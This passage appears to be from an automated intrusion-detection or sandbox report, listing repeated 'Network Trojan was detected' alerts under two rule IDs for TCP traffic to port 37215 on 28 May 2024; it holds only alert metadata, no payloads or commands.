          SID:2835222
          Source Port:47622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839648
          SID:2829579
          Source Port:49560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.679800
          SID:2829579
          Source Port:35600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678355
          SID:2835222
          Source Port:46296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485738
          SID:2829579
          Source Port:56292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144968
          SID:2835222
          Source Port:33124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062865
          SID:2829579
          Source Port:53316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048836
          SID:2829579
          Source Port:39458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328719
          SID:2829579
          Source Port:38390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550620
          SID:2835222
          Source Port:40768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.957913
          SID:2835222
          Source Port:35334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.188105
          SID:2829579
          Source Port:58592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328886
          SID:2829579
          Source Port:50204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046954
          SID:2835222
          Source Port:55750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.814049
          SID:2835222
          Source Port:60806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650038
          SID:2835222
          Source Port:49680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.089745
          SID:2835222
          Source Port:47882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033385
          SID:2829579
          Source Port:59594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161983
          SID:2835222
          Source Port:54170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.172114
          SID:2835222
          Source Port:40568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708889
          SID:2835222
          Source Port:48684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.221445
          SID:2829579
          Source Port:39824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767963
          SID:2829579
          Source Port:49092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.372155
          SID:2835222
          Source Port:37280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322769
          SID:2835222
          Source Port:58796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.159083
          SID:2829579
          Source Port:58218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.367030
          SID:2835222
          Source Port:58424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.474800
          SID:2829579
          Source Port:34734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.685021
          SID:2829579
          Source Port:43408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.203750
          SID:2829579
          Source Port:48056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.665376
          SID:2835222
          Source Port:53000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960694
          SID:2829579
          Source Port:36202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.219899
          SID:2829579
          Source Port:37956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.085355
          SID:2835222
          Source Port:47184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650598
          SID:2835222
          Source Port:35604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.989596
          SID:2829579
          Source Port:39606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.873417
          SID:2829579
          Source Port:35756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141722
          SID:2835222
          Source Port:58582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.998818
          SID:2835222
          Source Port:33074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.772844
          SID:2829579
          Source Port:47504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114614
          SID:2829579
          Source Port:51434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.862117
          SID:2829579
          Source Port:49766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.074417
          SID:2829579
          Source Port:57150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177257
          SID:2829579
          Source Port:38348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.233048
          SID:2829579
          Source Port:49216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272394
          SID:2829579
          Source Port:33978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841445
          SID:2835222
          Source Port:46118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.972206
          SID:2829579
          Source Port:45754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326375
          SID:2829579
          Source Port:36874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211706
          SID:2835222
          Source Port:52478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202683
          SID:2835222
          Source Port:38220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334212
          SID:2829579
          Source Port:41272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201283
          SID:2829579
          Source Port:41692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943249
          SID:2835222
          Source Port:58400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272375
          SID:2829579
          Source Port:53780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949870
          SID:2835222
          Source Port:48928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.697000
          SID:2829579
          Source Port:39168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.488245
          SID:2829579
          Source Port:35438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.717998
          SID:2829579
          Source Port:34092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680191
          SID:2835222
          Source Port:41344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.608863
          SID:2829579
          Source Port:33076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843357
          SID:2835222
          Source Port:53684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.863862
          SID:2829579
          Source Port:56734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.182995
          SID:2829579
          Source Port:38022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529918
          SID:2829579
          Source Port:59350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211856
          SID:2829579
          Source Port:60168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.988654
          SID:2835222
          Source Port:34404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711020
          SID:2829579
          Source Port:52802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535518
          SID:2835222
          Source Port:47506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.223462
          SID:2829579
          Source Port:35834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838686
          SID:2829579
          Source Port:34128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.725181
          SID:2835222
          Source Port:47320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.926609
          SID:2835222
          Source Port:55864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528090
          SID:2835222
          Source Port:35090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.976249
          SID:2829579
          Source Port:58968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987450
          SID:2835222
          Source Port:40966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794408
          SID:2835222
          Source Port:44500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.022858
          SID:2829579
          Source Port:43432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527197
          SID:2829579
          Source Port:45528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669413
          SID:2829579
          Source Port:46390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847778
          SID:2829579
          Source Port:44974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.865368
          SID:2835222
          Source Port:45556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204078
          SID:2835222
          Source Port:43300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.241510
          SID:2835222
          Source Port:41798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.348925
          SID:2829579
          Source Port:60030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.246001
          SID:2829579
          Source Port:57448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989042
          SID:2829579
          Source Port:51822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156487
          SID:2829579
          Source Port:59626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270523
          SID:2829579
          Source Port:34250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.500080
          SID:2835222
          Source Port:40752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324045
          SID:2829579
          Source Port:41270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.183130
          SID:2835222
          Source Port:56244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.492861
          SID:2829579
          Source Port:42786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.165005
          SID:2829579
          Source Port:55162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497173
          SID:2829579
          Source Port:48372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.145756
          SID:2829579
          Source Port:40946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.222872
          SID:2835222
          Source Port:54904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.427701
          SID:2835222
          Source Port:36612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067566
          SID:2835222
          Source Port:49278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680141
          SID:2835222
          Source Port:33120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651161
          SID:2835222
          Source Port:59978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590894
          SID:2835222
          Source Port:45768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530201
          SID:2829579
          Source Port:56182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466121
          SID:2829579
          Source Port:48136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.316884
          SID:2829579
          Source Port:47342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.816153
          SID:2829579
          Source Port:39320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268675
          SID:2835222
          Source Port:57938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977400
          SID:2829579
          Source Port:60108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543662
          SID:2835222
          Source Port:54054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177165
          SID:2835222
          Source Port:33410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878755
          SID:2835222
          Source Port:54338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689442
          SID:2835222
          Source Port:53246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941636
          SID:2835222
          Source Port:60468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.019407
          SID:2835222
          Source Port:49360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.221020
          SID:2835222
          Source Port:59940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484881
          SID:2829579
          Source Port:37564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847498
          SID:2835222
          Source Port:42496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.933521
          SID:2835222
          Source Port:42606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.270371
          SID:2829579
          Source Port:41790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.627152
          SID:2835222
          Source Port:53642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.865422
          SID:2835222
          Source Port:59892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.160398
          SID:2829579
          Source Port:55460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350638
          SID:2829579
          Source Port:40970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272328
          SID:2835222
          Source Port:44944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839497
          SID:2829579
          Source Port:39188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322235
          SID:2835222
          Source Port:50716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.909203
          SID:2835222
          Source Port:57254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154084
          SID:2835222
          Source Port:36978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048740
          SID:2829579
          Source Port:56880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.235672
          SID:2835222
          Source Port:47302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923678
          SID:2835222
          Source Port:58584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.157009
          SID:2835222
          Source Port:39462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.138104
          SID:2835222
          Source Port:49158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.070526
          SID:2829579
          Source Port:37636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.473389
          SID:2835222
          Source Port:33978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268607
          SID:2829579
          Source Port:39662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767684
          SID:2829579
          Source Port:45234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.557300
          SID:2829579
          Source Port:56946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797610
          SID:2835222
          Source Port:36712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298924
          SID:2835222
          Source Port:60634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.611397
          SID:2829579
          Source Port:42062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.704810
          SID:2829579
          Source Port:41858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154584
          SID:2829579
          Source Port:58294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.205596
          SID:2829579
          Source Port:45088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.088093
          SID:2835222
          Source Port:53072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543201
          SID:2835222
          Source Port:56356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893215
          SID:2835222
          Source Port:54632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794227
          SID:2829579
          Source Port:49098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551708
          SID:2829579
          Source Port:43656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144071
          SID:2835222
          Source Port:32800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778308
          SID:2835222
          Source Port:40342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201156
          SID:2835222
          Source Port:55212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.542346
          SID:2835222
          Source Port:46280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485939
          SID:2835222
          Source Port:54110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652273
          SID:2829579
          Source Port:44342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.355687
          SID:2835222
          Source Port:49630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938169
          SID:2829579
          Source Port:59430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742327
          SID:2835222
          Source Port:60012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178376
          SID:2829579
          Source Port:53454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328826
          SID:2829579
          Source Port:47446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.856312
          SID:2829579
          Source Port:55454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.105614
          SID:2835222
          Source Port:33910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.565189
          SID:2835222
          Source Port:41058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.915259
          SID:2835222
          Source Port:46746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268628
          SID:2829579
          Source Port:49006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463419
          SID:2829579
          Source Port:55828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291477
          SID:2835222
          Source Port:58482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795020
          SID:2829579
          Source Port:43846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147406
          SID:2829579
          Source Port:54774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770386
          SID:2835222
          Source Port:52692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183151
          SID:2829579
          Source Port:46476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846932
          SID:2829579
          Source Port:45984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656670
          SID:2829579
          Source Port:45210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722362
          SID:2835222
          Source Port:53924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141691
          SID:2835222
          Source Port:45528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.171872
          SID:2835222
          Source Port:46158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216989
          SID:2835222
          Source Port:55096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125551
          SID:2835222
          Source Port:47828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.135976
          SID:2829579
          Source Port:59470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327949
          SID:2829579
          Source Port:59718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.510368
          SID:2835222
          Source Port:42634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727172
          SID:2835222
          Source Port:59288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.991726
          SID:2835222
          Source Port:37276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.557884
          SID:2829579
          Source Port:51750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561806
          SID:2829579
          Source Port:55896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793362
          SID:2835222
          Source Port:57732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464288
          SID:2829579
          Source Port:33032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890303
          SID:2829579
          Source Port:48084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.933522
          SID:2829579
          Source Port:59476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473584
          SID:2829579
          Source Port:59414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268694
          SID:2835222
          Source Port:51316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797212
          SID:2829579
          Source Port:58452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400948
          SID:2829579
          Source Port:42090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.854337
          SID:2835222
          Source Port:52938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953412
          SID:2835222
          Source Port:41712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975328
          SID:2829579
          Source Port:47110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.221919
          SID:2835222
          Source Port:54582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.886218
          SID:2829579
          Source Port:37290
          Destination Port:37215
